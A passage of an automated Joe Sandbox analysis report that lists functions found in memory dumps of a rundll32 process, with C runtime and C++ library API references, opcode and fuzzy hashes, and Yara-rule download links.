Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
String ID:
API String ID: 3669027769-0
Opcode ID: d84545b744132abf258f2739307021ab7867776e2950de2c885c0764620f8872
Instruction ID: 1957d9e42d7dbf144290f6cd112fc055a6b45e714320b40cdeffc9302539d3ac
Opcode Fuzzy Hash: d84545b744132abf258f2739307021ab7867776e2950de2c885c0764620f8872
Instruction Fuzzy Hash: 07F0FE72309DD080EB62AB95F1813EC53E2A758B98F0D5621EE950F387DE24C491C251

Function 000001E51AE2E4CD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 000001E51AE14448: _getptd.LIBCMT ref: 000001E51AE14455
Part of subcall function 000001E51AE14448: _inconsistency.LIBCMT ref: 000001E51AE14463
Part of subcall function 000001E51AE14448: _getptd.LIBCMT ref: 000001E51AE14468
Part of subcall function 000001E51AE14448: _inconsistency.LIBCMT ref: 000001E51AE14484

__DestructExceptionObject.LIBCMT ref: 000001E51AE2E51A
_getptd.LIBCMT ref: 000001E51AE2E520
_getptd.LIBCMT ref: 000001E51AE2E533

Part of subcall function 000001E51AE144D8: _getptd.LIBCMT ref: 000001E51AE144E1

Strings

csm, xrefs: 000001E51AE2E4ED

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: _getptd$_inconsistency$DestructExceptionObject
String ID: csm
API String ID: 2821275340-1018135373
Opcode ID: 242ad1541a1665e7e88aaf19789ec1deda19dbf05a08f0dcd3087e0f0a85a81f
Instruction ID: 5ebe60bf9697cc786f0e0d654249623bdf4dea9c291f6734f0a1a98cf62872a0
Opcode Fuzzy Hash: 242ad1541a1665e7e88aaf19789ec1deda19dbf05a08f0dcd3087e0f0a85a81f
Instruction Fuzzy Hash: E3016772145AD185EB61BF71E4813ED27E7E75475DF091621DD094A747FF20D885C340

Function 000001E51AE13770 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30COMMONLIBRARYCODE

Download Yara Rule

APIs

_callnewh.LIBCMT ref: 000001E51AE1377E
malloc.LIBCMT ref: 000001E51AE1378A

Part of subcall function 000001E51AE122A8: _FF_MSGBANNER.LIBCMT ref: 000001E51AE122D8
Part of subcall function 000001E51AE122A8: _NMSG_WRITE.LIBCMT ref: 000001E51AE122E2
Part of subcall function 000001E51AE122A8: HeapAlloc.KERNEL32 ref: 000001E51AE122FD
Part of subcall function 000001E51AE122A8: _callnewh.LIBCMT ref: 000001E51AE12316
Part of subcall function 000001E51AE122A8: _errno.LIBCMT ref: 000001E51AE12321
Part of subcall function 000001E51AE122A8: _errno.LIBCMT ref: 000001E51AE1232C

_CxxThrowException.LIBCMT ref: 000001E51AE137D3

Part of subcall function 000001E51AE13FB8: RtlPcToFileHeader.KERNEL32 ref: 000001E51AE14026
Part of subcall function 000001E51AE13FB8: RaiseException.KERNEL32 ref: 000001E51AE14065

Strings

bad allocation, xrefs: 000001E51AE1379A

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
String ID: bad allocation
API String ID: 1214304046-2104205924
Opcode ID: b642b03be230f377a94fb8bf127ac4337ba363d888bade25789cd85e7bf78fa8
Instruction ID: 75743e2b4b4f2417f4f6469496c22a00e15a351aa0148c6e82f06de40486872d
Opcode Fuzzy Hash: b642b03be230f377a94fb8bf127ac4337ba363d888bade25789cd85e7bf78fa8
Instruction Fuzzy Hash: 82F06DB1209F9B91EF62A751E4007DD63D6E78439CF480624DE4D0BA97EA7CC145CB00

Function 000001E5190A0EB8 Relevance: 6.1, APIs: 4, Instructions: 113COMMON

Download Yara Rule

APIs

_wfsopen.LIBCMT ref: 000001E5190A0E4D
fclose.LIBCMT ref: 000001E5190A0E5A
_wfsopen.LIBCMT ref: 000001E5190A0E6F
fseek.LIBCMT ref: 000001E5190A0E89

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: _wfsopen$fclosefseek
String ID:
API String ID: 1261181034-0
Opcode ID: 66608ed3d9a3b7f166453832a9f1b2a902d53ff026ec2d0a3286f5d598873d35
Instruction ID: cffc308e6a219b8b73192189a4b7666edc1994daeb8575b90c56e1e80be9a5eb
Opcode Fuzzy Hash: 66608ed3d9a3b7f166453832a9f1b2a902d53ff026ec2d0a3286f5d598873d35
Instruction Fuzzy Hash: FE31A630255E8D8EE7A8DB1CD4923EA72F2E745308F1C446DDD8BC3292D625DC4286C2

Function 000001E5190B8A6C Relevance: 6.1, APIs: 4, Instructions: 99COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000001E5190C3018: malloc.LIBCMT ref: 000001E5190C3032

std::_Locinfo::_Locinfo.LIBCPMTD ref: 000001E5190B8AE8
std::_Locinfo::_Gettnames.LIBCPMT ref: 000001E5190B8B10
free.LIBCMT ref: 000001E5190B8B28
std::_Locinfo::~_Locinfo.LIBCPMTD ref: 000001E5190B8B3F

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LocinfoLocinfo::_$GettnamesLocinfo::~_freemalloc
String ID:
API String ID: 409281135-0
Opcode ID: 0c3ddc91d2b006acc8b60784553b8ba10a7dca4d57a8f93519ec96857e636940
Instruction ID: 7442fb6a470017f0291cefd3dc060f9b2f4d117f01e51d453f77d435ab3993be
Opcode Fuzzy Hash: 0c3ddc91d2b006acc8b60784553b8ba10a7dca4d57a8f93519ec96857e636940
Instruction Fuzzy Hash: E3318171118E498FEBA8DF18C095BEA73F2FB58315F58069E9C4AC72A2DB70D900C781

Function 000001E5190A6490 Relevance: 6.1, APIs: 4, Instructions: 99COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000001E5190C3018: malloc.LIBCMT ref: 000001E5190C3032

std::_Locinfo::_Locinfo.LIBCPMTD ref: 000001E5190A650C
std::_Locinfo::_Gettnames.LIBCPMT ref: 000001E5190A6534
free.LIBCMT ref: 000001E5190A654C
std::_Locinfo::~_Locinfo.LIBCPMTD ref: 000001E5190A6563

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LocinfoLocinfo::_$GettnamesLocinfo::~_freemalloc
String ID:
API String ID: 409281135-0
Opcode ID: b0350cc8b461ada8f143b32dd75d94f1cb74beae973b0a62e1c342981cbefe1a
Instruction ID: 40d0b2744f58b091ab1db829a1bb82898ec624bd94c90db0de53acdbbc6d419d
Opcode Fuzzy Hash: b0350cc8b461ada8f143b32dd75d94f1cb74beae973b0a62e1c342981cbefe1a
Instruction Fuzzy Hash: 38319171118E498FEB69DF18C884BEA73F1FB98319F58069D9849C71A6DB70D800CBC1

Function 000001E5190A6398 Relevance: 6.1, APIs: 4, Instructions: 99COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000001E5190C3018: malloc.LIBCMT ref: 000001E5190C3032

std::_Locinfo::_Locinfo.LIBCPMTD ref: 000001E5190A6414
std::_Locinfo::_Gettnames.LIBCPMT ref: 000001E5190A643C
free.LIBCMT ref: 000001E5190A6454
std::_Locinfo::~_Locinfo.LIBCPMTD ref: 000001E5190A646B

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: std::_$LocinfoLocinfo::_$GettnamesLocinfo::~_freemalloc
String ID:
API String ID: 409281135-0
Opcode ID: c2fdb474924eb8315d998c80493699ed0ab12c0f657938f58dd9487b9441d48b
Instruction ID: 8d94e7b14f8c788ba64addea60dc945df3c053c502b412456a750b1789e13c28
Opcode Fuzzy Hash: c2fdb474924eb8315d998c80493699ed0ab12c0f657938f58dd9487b9441d48b
Instruction Fuzzy Hash: C7316D71118E498FEBA4DF18D491BEA73F1FB98319F55069D984AC71A2DB74D800CBC1

Function 000001E51AE17788 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000001E51AE177B2

Part of subcall function 000001E51AE13B7C: _getptd.LIBCMT ref: 000001E51AE13B92
Part of subcall function 000001E51AE13B7C: __updatetlocinfo.LIBCMT ref: 000001E51AE13BC7
Part of subcall function 000001E51AE13B7C: __updatetmbcinfo.LIBCMT ref: 000001E51AE13BEE

_malloc_crt.LIBCMT ref: 000001E51AE177F5
_invoke_watson.LIBCMT ref: 000001E51AE178BA

Part of subcall function 000001E51AE1A508: _call_reportfault.LIBCMT ref: 000001E51AE1A530

_invoke_watson.LIBCMT ref: 000001E51AE178D0

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: Locale_invoke_watson$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_call_reportfault_getptd_malloc_crt
String ID:
API String ID: 1584724053-0
Opcode ID: 3daca0f6dc92f9794fddbcc1cdaa0d0f178e51dead4e14673644e8c31eb13f91
Instruction ID: 6cc8a5ca7c2443dbfc936e86ea81311dd46e5b1232b952c91c51a14080b756ab
Opcode Fuzzy Hash: 3daca0f6dc92f9794fddbcc1cdaa0d0f178e51dead4e14673644e8c31eb13f91
Instruction Fuzzy Hash: F1319372758AA582EB169B25D5053DD77E2E785FC8F488225DF490FB8BDE38D0028744

Function 000001E519095E28 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

_fseeki64.LIBCMT ref: 000001E519095EBC

Part of subcall function 000001E5190C1DBC: _errno.LIBCMT ref: 000001E5190C1DE5
Part of subcall function 000001E5190C1DBC: _invalid_parameter_noinfo.LIBCMT ref: 000001E5190C1DF0

fgetpos.LIBCMT ref: 000001E519095ED6
fpos.LIBCPMTD ref: 000001E519095EEB
fpos.LIBCPMTD ref: 000001E519095F2B

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: fpos$_errno_fseeki64_invalid_parameter_noinfofgetpos
String ID:
API String ID: 3188862907-0
Opcode ID: c6c53303b0747acdde5ada9e622c71b4572c09a9b9df7f851f5bf6a1ead528d1
Instruction ID: dac7b88c713ffe26d3e0b0613a83f1e7ec93fe9ad61141aa43d755d62ae68e6b
Opcode Fuzzy Hash: c6c53303b0747acdde5ada9e622c71b4572c09a9b9df7f851f5bf6a1ead528d1
Instruction Fuzzy Hash: D931CF30118A859FD744EB18C485B9E77F2FB99348F58096DF88DC32A2DA75DD41CB42

Function 000001E519095D18 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

_fseeki64.LIBCMT ref: 000001E519095DB1
fgetpos.LIBCMT ref: 000001E519095DCB
fpos.LIBCPMTD ref: 000001E519095DE0
fpos.LIBCPMTD ref: 000001E519095E0B

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: fpos$_fseeki64fgetpos
String ID:
API String ID: 1811617113-0
Opcode ID: 4dd5a6bf44b4f08af2fe84d530f4457cc968653dd13fc1324dcdb608c86c5414
Instruction ID: df3df42cf187162e1be4fcb63e9fee05d6d091087d0b41a4a3db332e34579a89
Opcode Fuzzy Hash: 4dd5a6bf44b4f08af2fe84d530f4457cc968653dd13fc1324dcdb608c86c5414
Instruction Fuzzy Hash: F631E030129E858FD794EB18C449BAEB7F2FB99344F44095DE989C32A1C671D841CB42

Function 000001E51ADF1610 Relevance: 6.1, APIs: 4, Instructions: 75COMMONLIBRARYCODE

Download Yara Rule

APIs

_wfsopen.LIBCMT ref: 000001E51ADF15A5
fclose.LIBCMT ref: 000001E51ADF15B2
_wfsopen.LIBCMT ref: 000001E51ADF15C7
fseek.LIBCMT ref: 000001E51ADF15E1

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: _wfsopen$fclosefseek
String ID:
API String ID: 1261181034-0
Opcode ID: 66608ed3d9a3b7f166453832a9f1b2a902d53ff026ec2d0a3286f5d598873d35
Instruction ID: a97b2bc8885f108e062ebf925eb554322048f1b6f960467e1c499f230763e15d
Opcode Fuzzy Hash: 66608ed3d9a3b7f166453832a9f1b2a902d53ff026ec2d0a3286f5d598873d35
Instruction Fuzzy Hash: 3821DD31711F9085EB6AC72AD4517EF23E3AB86B9CF188224EF4A47793DA2DC4428740

Function 000001E51AE2CB40 Relevance: 6.1, APIs: 4, Instructions: 62stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000001E51AE2CB64

Part of subcall function 000001E51AE13B7C: _getptd.LIBCMT ref: 000001E51AE13B92
Part of subcall function 000001E51AE13B7C: __updatetlocinfo.LIBCMT ref: 000001E51AE13BC7
Part of subcall function 000001E51AE13B7C: __updatetmbcinfo.LIBCMT ref: 000001E51AE13BEE

_errno.LIBCMT ref: 000001E51AE2CB70

Part of subcall function 000001E51AE13B0C: _getptd_noexit.LIBCMT ref: 000001E51AE13B10

_invalid_parameter_noinfo.LIBCMT ref: 000001E51AE2CB7B
strchr.LIBCMT ref: 000001E51AE2CB91

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
String ID:
API String ID: 4151157258-0
Opcode ID: eb64e8c74a50022202f8ee626fe7dbe8f97126340f84a3ce38f6fe5f0cae3986
Instruction ID: 9a5fc0e1182b71ac475bb7339d94f534e8c7d47e6bad3df66ac95c7053a28ae8
Opcode Fuzzy Hash: eb64e8c74a50022202f8ee626fe7dbe8f97126340f84a3ce38f6fe5f0cae3986
Instruction Fuzzy Hash: 6921C37260CAE441FB625756D4903FDA7D2E3C4BDCF184B26EE860A6C7E92CC8618711

Function 000001E51AE091C4 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000001E51AE13770: malloc.LIBCMT ref: 000001E51AE1378A

std::_Locinfo::_Locinfo.LIBCPMTD ref: 000001E51AE09240
std::_Locinfo::_Gettnames.LIBCPMT ref: 000001E51AE09268
free.LIBCMT ref: 000001E51AE09280
std::_Locinfo::~_Locinfo.LIBCPMTD ref: 000001E51AE09297

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$LocinfoLocinfo::_$GettnamesLocinfo::~_freemalloc
String ID:
API String ID: 409281135-0
Opcode ID: d8e69efa26ad0008533831846f76d24351a0b3f39eb347073c5dfcd3e47a997e
Instruction ID: 464e71166d63abca08d1fe967b9ab23b728ab00994d9832c35f68c62b851ca46
Opcode Fuzzy Hash: d8e69efa26ad0008533831846f76d24351a0b3f39eb347073c5dfcd3e47a997e
Instruction Fuzzy Hash: E5216672309F8086EB26CF15E1503ED73E6F798BA8F844225CE9887396DB78C841C380

Function 000001E51ADE6580 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

_fseeki64.LIBCMT ref: 000001E51ADE6614

Part of subcall function 000001E51AE12514: _errno.LIBCMT ref: 000001E51AE1253D
Part of subcall function 000001E51AE12514: _invalid_parameter_noinfo.LIBCMT ref: 000001E51AE12548

fgetpos.LIBCMT ref: 000001E51ADE662E
fpos.LIBCPMTD ref: 000001E51ADE6643
fpos.LIBCPMTD ref: 000001E51ADE6683

Part of subcall function 000001E51AE12AA4: _errno.LIBCMT ref: 000001E51AE12AAD
Part of subcall function 000001E51AE12AA4: _invalid_parameter_noinfo.LIBCMT ref: 000001E51AE12AB8

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfofpos$_fseeki64fgetpos
String ID:
API String ID: 1989672365-0
Opcode ID: e02842f5a42da3625d84d50036dede68edc7dbfdcb998bdce8beb25ad7a6383a
Instruction ID: 5a1d0ab0734f02c8b81c8da933e250f38d4d245bdeca3113ce37c7fa052001f1
Opcode Fuzzy Hash: e02842f5a42da3625d84d50036dede68edc7dbfdcb998bdce8beb25ad7a6383a
Instruction Fuzzy Hash: 8431CA76218EC081DB12DB15E49139EABE2F7C5B88F504165EE8C87B6BCF39C5408B40

Function 000001E51ADF6BE8 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000001E51AE13770: malloc.LIBCMT ref: 000001E51AE1378A

std::_Locinfo::_Locinfo.LIBCPMTD ref: 000001E51ADF6C64
std::_Locinfo::_Gettnames.LIBCPMT ref: 000001E51ADF6C8C
free.LIBCMT ref: 000001E51ADF6CA4
std::_Locinfo::~_Locinfo.LIBCPMTD ref: 000001E51ADF6CBB

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$LocinfoLocinfo::_$GettnamesLocinfo::~_freemalloc
String ID:
API String ID: 409281135-0
Opcode ID: 1c985824af1acae9496c5e71a96abd0544d665edfd3f96118f34935afdf6e220
Instruction ID: 03dd242c6f6fb0ef1791dae030108b4e319f47972be3e1e423ed9ac98878acf0
Opcode Fuzzy Hash: 1c985824af1acae9496c5e71a96abd0544d665edfd3f96118f34935afdf6e220
Instruction Fuzzy Hash: B1217532201F8081EB26CF21D4503EE77E6F798BA8F854225DEA847796DB38C942C780

Function 000001E51ADF6AF0 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000001E51AE13770: malloc.LIBCMT ref: 000001E51AE1378A

std::_Locinfo::_Locinfo.LIBCPMTD ref: 000001E51ADF6B6C
std::_Locinfo::_Gettnames.LIBCPMT ref: 000001E51ADF6B94
free.LIBCMT ref: 000001E51ADF6BAC
std::_Locinfo::~_Locinfo.LIBCPMTD ref: 000001E51ADF6BC3

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$LocinfoLocinfo::_$GettnamesLocinfo::~_freemalloc
String ID:
API String ID: 409281135-0
Opcode ID: ee97dc229c5cd99bb1ca05c9355866ee283a5751f5faa2f00eedab80158d67f4
Instruction ID: 0e77dc7026ff5237ff0bed295049b829faff3422ce19bd522666f92098920683
Opcode Fuzzy Hash: ee97dc229c5cd99bb1ca05c9355866ee283a5751f5faa2f00eedab80158d67f4
Instruction Fuzzy Hash: 20216672205F8481EB26CF21D4543DE73E6F798BA8F844265DE9C4779ADB38C946C780

Function 000001E51ADE6470 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

_fseeki64.LIBCMT ref: 000001E51ADE6509
fgetpos.LIBCMT ref: 000001E51ADE6523
fpos.LIBCPMTD ref: 000001E51ADE6538
fpos.LIBCPMTD ref: 000001E51ADE6563

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: fpos$_fseeki64fgetpos
String ID:
API String ID: 1811617113-0
Opcode ID: 4dd5a6bf44b4f08af2fe84d530f4457cc968653dd13fc1324dcdb608c86c5414
Instruction ID: ac28024139a8d26f9d1bd5f1cff5e5bfbbcefbab39bcd1e5152cc1ffcee4b3fd
Opcode Fuzzy Hash: 4dd5a6bf44b4f08af2fe84d530f4457cc968653dd13fc1324dcdb608c86c5414
Instruction Fuzzy Hash: 1F31A672608EC481EB51DB15E4813AEA7F2F785B98F500425EE8D47BABCF79C8848B40

Function 000001E51909AF88 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 000001E51909AFA3

Part of subcall function 000001E51909B6C0: std::locale::_Locimp::_Locimp.LIBCPMT ref: 000001E51909B6EE

__int64.LIBCPMTD ref: 000001E51909AFBF

Part of subcall function 000001E519091398: std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190913B3

_aligned_msize.LIBCMTD ref: 000001E51909AFD4

Part of subcall function 000001E5190914D8: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 000001E5190914FA

codecvt.LIBCPMTD ref: 000001E51909AFDD

Part of subcall function 000001E519091B18: std::locale::c_str.LIBCPMTD ref: 000001E519091B7A
Part of subcall function 000001E519091B18: std::_Locinfo::_Locinfo.LIBCPMTD ref: 000001E519091B87
Part of subcall function 000001E519091B18: collate.LIBCPMTD ref: 000001E519091BB3
Part of subcall function 000001E519091B18: std::_Locinfo::~_Locinfo.LIBCPMTD ref: 000001E519091BF7

Part of subcall function 000001E519094778: Concurrency::cancellation_token::_Clear.LIBCPMTD ref: 000001E5190947A0
Part of subcall function 000001E519094778: malloc.LIBCMT ref: 000001E5190947F9

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: Locimp::_std::_std::locale::_$LocimpLocinfo$AddfacClearConcurrency::cancellation_token::_Locimp_Locinfo::_Locinfo::~_LockitLockit::_New___int64_aligned_msizecodecvtcollatemallocstd::locale::c_str
String ID:
API String ID: 2541660624-0
Opcode ID: 58eda042d10801f7b57768f629ec788ac31b79f2513f95b0baad2b10f0f1f92d
Instruction ID: 1f68c6c09f8d63f3758b6bfef17e2112fb3f4e93c935447dedea9936231269d9
Opcode Fuzzy Hash: 58eda042d10801f7b57768f629ec788ac31b79f2513f95b0baad2b10f0f1f92d
Instruction Fuzzy Hash: CE11A834228E899FD784EF2CC485B9977F2FB99314F84495DB449C72A1DA74D8448B42

Function 000001E519091A28 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

std::bad_exception::bad_exception.LIBCMTD ref: 000001E519091A52

Part of subcall function 000001E519091808: std::locale::facet::facet.LIBCPMTD ref: 000001E519091820

std::_Locinfo::_Locinfo.LIBCPMTD ref: 000001E519091A76

Part of subcall function 000001E519091088: std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190910A9
Part of subcall function 000001E519091088: _Yarn.LIBCPMTD ref: 000001E5190910BB
Part of subcall function 000001E519091088: _Yarn.LIBCPMTD ref: 000001E5190910CD
Part of subcall function 000001E519091088: _Yarn.LIBCPMTD ref: 000001E5190910DF
Part of subcall function 000001E519091088: _Yarn.LIBCPMTD ref: 000001E5190910F1
Part of subcall function 000001E519091088: _Yarn.LIBCPMTD ref: 000001E519091103
Part of subcall function 000001E519091088: _Yarn.LIBCPMTD ref: 000001E519091115
Part of subcall function 000001E519091088: std::bad_exception::bad_exception.LIBCMTD ref: 000001E51909112F
Part of subcall function 000001E519091088: _CxxThrowException.LIBCMT ref: 000001E519091140

codecvt.LIBCPMTD ref: 000001E519091A89

Part of subcall function 000001E519091C48: std::_Locinfo::_Getcvt.LIBCPMTD ref: 000001E519091C74

std::_Locinfo::~_Locinfo.LIBCPMTD ref: 000001E519091A94

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: Yarn$std::_$LocinfoLocinfo::_std::bad_exception::bad_exception$ExceptionGetcvtLocinfo::~_LockitLockit::_Throwcodecvtstd::locale::facet::facet
String ID:
API String ID: 3485682108-0
Opcode ID: 3871120677c23c23d88de505935f11af323c157f0d755e3ee0aa1d801b5552f5
Instruction ID: 17c9ea0cbf80765ae4db288370c8284dc6293265876cfcd4fec005d5504548c5
Opcode Fuzzy Hash: 3871120677c23c23d88de505935f11af323c157f0d755e3ee0aa1d801b5552f5
Instruction Fuzzy Hash: 44011930118B8D8FD7A4EB18D481BDBB3E2FB95304F805A1DA09DC31A1DB7599098B42

Function 000001E51ADEB6E0 Relevance: 6.0, APIs: 4, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 000001E51ADEB6FB

Part of subcall function 000001E51ADEBE18: std::locale::_Locimp::_Locimp.LIBCPMT ref: 000001E51ADEBE46

__int64.LIBCPMTD ref: 000001E51ADEB717

Part of subcall function 000001E51ADE1AF0: std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADE1B0B
Part of subcall function 000001E51ADE1AF0: std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADE1B3D

_aligned_msize.LIBCMTD ref: 000001E51ADEB72C

Part of subcall function 000001E51ADE1C30: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 000001E51ADE1C52

codecvt.LIBCPMTD ref: 000001E51ADEB735

Part of subcall function 000001E51ADE2270: std::locale::c_str.LIBCPMTD ref: 000001E51ADE22D2
Part of subcall function 000001E51ADE2270: std::_Locinfo::_Locinfo.LIBCPMTD ref: 000001E51ADE22DF
Part of subcall function 000001E51ADE2270: collate.LIBCPMTD ref: 000001E51ADE230B
Part of subcall function 000001E51ADE2270: std::_Locinfo::~_Locinfo.LIBCPMTD ref: 000001E51ADE234F

Part of subcall function 000001E51ADE4ED0: Concurrency::cancellation_token::_Clear.LIBCPMTD ref: 000001E51ADE4EF8
Part of subcall function 000001E51ADE4ED0: malloc.LIBCMT ref: 000001E51ADE4F51

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

